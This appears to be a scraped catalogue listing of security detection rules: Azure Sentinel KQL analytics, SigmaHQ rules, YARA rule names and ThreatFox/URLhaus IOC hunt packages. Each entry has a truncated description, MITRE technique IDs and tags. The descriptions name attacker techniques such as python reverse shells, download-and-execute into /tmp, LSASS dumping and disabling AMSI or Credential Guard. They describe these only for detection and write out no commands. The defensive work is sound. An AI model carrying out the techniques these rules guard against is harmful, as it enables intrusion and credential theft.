'This detection will alert when RunningRAT URI parameters or paths are detect in an HTTP request. Id the device blocked this communication presence of this alert means the RunningRAT implant is likely

backdoormicrosoftofficial
Azure-Sentinel source
T1562
DeviceProcessEventsSecurityEventWindowsEvent

'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p

backdoormicrosoftofficial
Azure-Sentinel source
T1566
AzureDiagnosticsCommonSecurityLogDeviceNetworkEventsEmailEventsEmailUrlInfoVMConnection

'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'

microsoftofficial
Azure-Sentinel source
DeviceProcessEvents

Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

' This query will detect when an attempt is made to update an existing user and link it to an guest or external identity. These activities are unusual and such linking of external identities should b

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogsSigninLogs

' This query will detect logins from guest account which was recently deleted. For any successful logins from deleted identities should be investigated further if any existing user accounts have been

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogsIdentityInfo

'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
BehaviorAnalytics

'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes

credential-theftmicrosoftofficial
Azure-Sentinel source
T1078T1106T1526
AuditLogsIdentityInfoSecurityAlert

'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud

microsoftofficial
Azure-Sentinel source
T1030
CommonSecurityLog

'Identifies anamalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from

backdoormicrosoftofficial
Azure-Sentinel source
T1030
CommonSecurityLogVMConnection

'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detects large deviations from a baseline pattern. A sudden increase in data t

backdoormicrosoftofficial
Trust Monitor Event
kql medium
Azure-Sentinel source
T1528T1555

'This query identifies when a new trust monitor event is detected.'

microsoftofficial
Unusual Anomaly
kql medium
Azure-Sentinel source

'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ

backdoormicrosoftofficial
Azure-Sentinel source
T1136
DeviceProcessEventsSecurityEvent

' The query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands Reference: https://www.m

microsoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogsSigninLogs

'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with

backdoormicrosoftofficial
Azure-Sentinel source
T1136.003
AuditLogs

'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistant access to an environment, lo

backdoormicrosoftofficial
Azure-Sentinel source
T1136.003
AuditLogs

'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist

backdoormicrosoftofficial
Azure-Sentinel source
T1098
AuditLogs

'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account

backdoormicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif

microsoftofficial
Azure-Sentinel source
T1110
CommonSecurityLog

'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in

microsoftofficial
Azure-Sentinel source
T1041T1071.001
CommonSecurityLogDeviceEvents

'This detection will identify network requests in HTTP proxy data that contains Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen usee by POLONIUM in their Runn

backdoormicrosoftofficial
SigmaHQ source
T1036.002
imProcessCreate

Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad

backdoorevasion
Azure-Sentinel source
T1059T1027T1140
imProcessCreate

'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak

microsoftofficial
Azure-Sentinel source
T1110
imAuthentication

'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no

credential-theftmicrosoftofficial
Yara-Rules source

YARA rule: DebuggerCheck__DrWatson

community
Yara-Rules source

YARA rule: DebuggerCheck__GlobalFlags

community
Yara-Rules source

YARA rule: DebuggerCheck__PEB

community
Yara-Rules source

YARA rule: DebuggerCheck__QueryInfo

community
Yara-Rules source

YARA rule: DebuggerCheck__RemoteAPI

community
Yara-Rules source

YARA rule: DebuggerException__ConsoleCtrl

community
Yara-Rules source

YARA rule: DebuggerException__SetConsoleCtrl

community
Yara-Rules source

YARA rule: DebuggerException__UnhandledFilter

community
Yara-Rules source

YARA rule: DebuggerHiding__Active

community
Yara-Rules source

YARA rule: DebuggerHiding__Thread

community
Yara-Rules source

YARA rule: DebuggerOutput__String

community
Yara-Rules source

YARA rule: DebuggerPattern__RDTSC

community
Yara-Rules source

YARA rule: DebuggerTiming__PerformanceCounter

community
Yara-Rules source

YARA rule: DebuggerTiming__Ticks

community
Azure-Sentinel source
T1569T1003
SecurityAlertimProcessCreate

'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th

lateral-movementmicrosoftofficial
Azure-Sentinel source
T1071.001

'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en

microsoftofficial
Azure-Sentinel source
T1496

'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s

microsoftofficial
Azure-Sentinel source
T1048

'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th

microsoftofficial
Azure-Sentinel source
T1110T1556

This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c

credential-theftmicrosoftofficial
Azure-Sentinel source
T1568T1008

'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in

backdoormicrosoftofficial
Azure-Sentinel source
T1564
imProcessCreate

'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'

microsoftofficial
Azure-Sentinel source
T1547
imProcessCreate

'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m

microsoftofficial
Azure-Sentinel source
T1072T1570

'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice

microsoftofficial
Azure-Sentinel source
T1568T1008
DnsEvents

'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b

backdoormicrosoftofficial
Azure-Sentinel source
T1110
imAuthentication

'This query searches for failed attempts to log in from more than 15 various users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack To use t

microsoftofficial
Azure-Sentinel source
T1485T1036

'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri

microsoftofficial
Azure-Sentinel source
T1018
imProcessCreate

'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur

microsoftofficial
Azure-Sentinel source
T1485

'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple host and delete data on them.

microsoftofficial
SEH v3
yara low
Yara-Rules source

YARA rule: SEH__v3

community
SEH v4
yara low
Yara-Rules source

YARA rule: SEH__v4

community
SEH vba
yara low
Yara-Rules source

YARA rule: SEH__vba

community
SEH vectored
yara low
Yara-Rules source

YARA rule: SEH__vectored

community
Azure-Sentinel source
T1078T1098
imAuthentication

'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat

microsoftofficial
Azure-Sentinel source
T1195T1059T1546
imFileEvent

Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven

backdoormicrosoftofficial
Azure-Sentinel source
T1059T1543
imProcessCreate

Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv

backdoormicrosoftofficial
Yara-Rules source

YARA rule: ThreadControl__Context

community
ThreatFox source
DnsEvents

Hunt package for 108 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 31 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 14 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 9 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DeviceFileEventsUrlClickEvents

Hunt package for 4 IOCs associated with SocksProxyGo

iocthreatfoxwin-socksproxygo
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with XWorm

iocthreatfoxwin-xworm
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 46 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 32 malicious URLs tagged as ACRStealer

infostealeriocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1078
imAuthentication

'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu

microsoftofficial
WindowsPE
yara low
Yara-Rules source

YARA rule: WindowsPE

community
SigmaHQ source
T1059.006T1027.010
imProcessCreate

Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is

evasion
SigmaHQ source
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imFileEvent

Detects default file names outputted by the BloodHound collection tool SharpHound

SigmaHQ source
T1059.003T1021.004T1219
imProcessCreate

Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana

backdoorlateral-movementpowershell
SigmaHQ source
T1105T1570T1219
imFileEvent

Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr

backdoor
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.

SigmaHQ source
T1036
imProcessCreate

Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using

SigmaHQ source
T1195.002T1557
imProcessCreate

Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.

exploit
SigmaHQ source
T1195.002T1557
imFileEvent

Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar

exploit
SigmaHQ source
T1562.001
imRegistry

Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to

evasion
SigmaHQ source
T1083
imProcessCreate

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

SigmaHQ source
T1574.001
imFileEvent

Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol

backdoor
SigmaHQ source
T1548T1554
imProcessCreate

Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs

backdoor
SigmaHQ source
T1548T1554
imProcessCreate

Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs)

backdoor
SigmaHQ source
T1112T1574.001
imRegistry

Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious

SigmaHQ source
T1548.002T1546.001
imRegistry

Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can

evasionpersistence
SigmaHQ source
T1003.001
imProcessCreate

Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.

credential-theftevasion
SigmaHQ source
T1003T1562.001
DeviceImageLoadEvents

Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o

credential-theft
SigmaHQ source
T1547.001
imRegistry

Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to

persistence
SigmaHQ source
T1553.004
imProcessCreate

Detects installation of suspicious packages using system installation utilities

SigmaHQ source
T1562.001
imRegistry

Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can

credential-theftlateral-movement
SigmaHQ source
T1562.001
imRegistry

Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc

credential-theftlateral-movement
SigmaHQ source
T1562.001T1562.006
imRegistry

Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications

backdoor
SigmaHQ source
T1218T1105
imFileEvent

Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica

SigmaHQ source
T1059.001
imFileEvent

Detects the creation of known offensive powershell scripts used for exploitation

SigmaHQ source
T1056.002
DeviceImageLoadEvents

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

SigmaHQ source
T1547.009
imFileEvent

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

SigmaHQ source
T1486T1562.001
DeviceImageLoadEvents

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (

SigmaHQ source
T1574.001
imFileEvent

Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of VSS DLL by uncommon executables

SigmaHQ source
imFileEvent

Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicio

SigmaHQ source
T1547.001
imFileEvent

A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.

SigmaHQ source
T1552T1005T1059.004
imProcessCreate

Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,

credential-theft
SigmaHQ source
T1552T1005T1059.007
imProcessCreate

Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,

credential-theft
SigmaHQ source
T1059T1203
imProcessCreate

Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise

SigmaHQ source
T1127T1105T1133
imFileEvent

Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,

SigmaHQ source
T1082
imProcessCreate

Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.

SigmaHQ source
T1059.004T1027
imFileEvent

Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg

SigmaHQ source
T1071.004T1059.003
imNetworkSession

Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of a new office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc

SigmaHQ source
T1003.001T1003.002T1003.003T1003.004T1003.005
imFileEvent

Files with well-known filenames (parts of credential dump software or files produced by them) creation

SigmaHQ source
T1505.003T1190
imFileEvent

Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o

SigmaHQ source
T1003
imRegistry

Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co

SigmaHQ source
T1218T1021.003
DeviceImageLoadEvents

Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM &

credential-theftlateral-movement
SigmaHQ source
T1562.001
imProcessCreate

Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,

SigmaHQ source
T1562.012
imProcessCreate

Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable

SigmaHQ source
T1204.002
imFileEvent

Detects the creation of files with an executable or script extension by an Office application.

SigmaHQ source
T1653
imProcessCreate

Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or

SigmaHQ source
imNetworkSession

Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.

SigmaHQ source
T1203
imNetworkSession

Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42

exploit
SigmaHQ source
T1048.003
imProcessCreate

Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w

SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of VSS DLL by uncommon executables

SigmaHQ source
T1059.001T1021.003
DeviceImageLoadEvents

Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.

SigmaHQ source
T1070.002
imProcessCreate

Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks

SigmaHQ source
T1204.002T1547.001
imFileEvent

Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,

SigmaHQ source
DeviceImageLoadEvents

Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "dbghelp.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

SigmaHQ source
T1059.001
DeviceImageLoadEvents

Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.

SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

SigmaHQ source
imFileEvent

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.

SigmaHQ source
T1036
imFileEvent

Detects Windows executables that write files with suspicious extensions

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of "dbgcore.dll"

SigmaHQ source
T1068
imProcessCreate

Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman

SigmaHQ source
T1083T1552.001
imProcessCreate

Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende

SigmaHQ source
T1083T1552.001
imProcessCreate

Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende

SigmaHQ source
imFileEvent

Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence

SigmaHQ source
T1027.002
DeviceImageLoadEvents

Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a

evasion
SigmaHQ source
T1036
imProcessCreate

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

SigmaHQ source
T1595
imWebSession

Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.

SigmaHQ source
T1567T1572T1102
imNetworkSession

Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with suc

backdoor
SigmaHQ source
T1190T1505.003
imFileEvent

Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil

SigmaHQ source
T1036.007
imFileEvent

Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic

SigmaHQ source
T1547.001
imFileEvent

Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso

SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to

SigmaHQ source
T1087.002T1069.002T1482
imFileEvent

Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

SigmaHQ source
imFileEvent

Detects PowerShell creating a binary executable or a script file.

SigmaHQ source
T1059.004T1203
imProcessCreate

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution

SigmaHQ source
T1574.007T1548.002
DeviceImageLoadEvents

Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat

evasion
SigmaHQ source
T1592.004
imProcessCreate

Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.

SigmaHQ source
T1069.001
imProcessCreate

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

SigmaHQ source
T1204T1059.007T1105
imFileEvent

Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential

SigmaHQ source
T1555.003T1217
imFileEvent

Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract

SigmaHQ source
T1003.001
imFileEvent

Detects file creation events with filename patterns used by Impacket.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "mscorsvc.dll".

SigmaHQ source
T1219.002
imFileEvent

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l

SigmaHQ source
T1102
imNetworkSession

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

SigmaHQ source
T1036.002
imFileEvent

Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.

SigmaHQ source
T1059.005T1218.014
DeviceImageLoadEvents

Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt to execute malicious scripts within a trusted system process for

evasion
WCE wceaux.dll Access
sigma critical
SigmaHQ source
T1003
imRegistry

Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host

SigmaHQ source
T1204
imFileEvent

Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.

SigmaHQ source
T1059
DeviceImageLoadEvents

Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.

SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1059T1203
imProcessCreate

Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh

SigmaHQ source
T1070.004T1027.005T1485T1553.002
imRegistry

Detects files that have extensions commonly seen while SDelete is used to wipe files.

SigmaHQ source
T1087.001
imProcessCreate

Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

backdoor
SigmaHQ source
T1083
imProcessCreate

Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.

SigmaHQ source
imProcessCreate

Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.

SigmaHQ source
T1059
imProcessCreate

Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.

SigmaHQ source
imFileEvent

Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.

SigmaHQ source
T1102T1102.001
imNetworkSession

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at

SigmaHQ source
T1003.001
imFileEvent

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

SigmaHQ source
T1587
imProcessCreate

Detects known hacktool execution based on image name.

SigmaHQ source
T1046
imProcessCreate

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

SigmaHQ source
